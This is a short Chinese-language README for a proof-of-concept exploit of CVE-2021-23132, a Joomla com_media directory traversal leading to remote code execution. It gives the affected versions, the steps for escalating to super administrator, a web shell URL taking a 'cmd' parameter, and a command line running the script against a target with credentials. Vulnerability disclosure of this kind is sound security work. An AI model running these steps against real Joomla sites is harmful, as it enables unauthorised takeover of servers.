com_media 允许非预期的图片上传路径导致RCE。
com_media中的目录遍历导致RCE
两个CVE相同。
PoC(完整)
受影响版本:Joomla核心 <=3.9.24
用户条件:管理员账户(非超级管理员)
获取访问权限:创建超级管理员,然后触发RCE。
Joomla中的远程代码执行(RCE)
用你的凭据运行 cve-2021-23132.py 并访问链接进行rce:
http://target/templates/protostar/error.php?cmd=ls
PoC:
python3 cve-2021-23132.py -url http://192.168.72.140 -u admin -p 1234 -rce 1 -cmd ls

我编写的PoC支持使用目录遍历或RCE模式。
我使用目录遍历来触发RCE。
你可以使用 python3 cve-2021-23132.py -h 来了解如何使用PoC。
注意:确保你使用的是python3并通过 pip3 install lxml 安装 lmxl
请利用你的研究,帮助Joomla更加安全。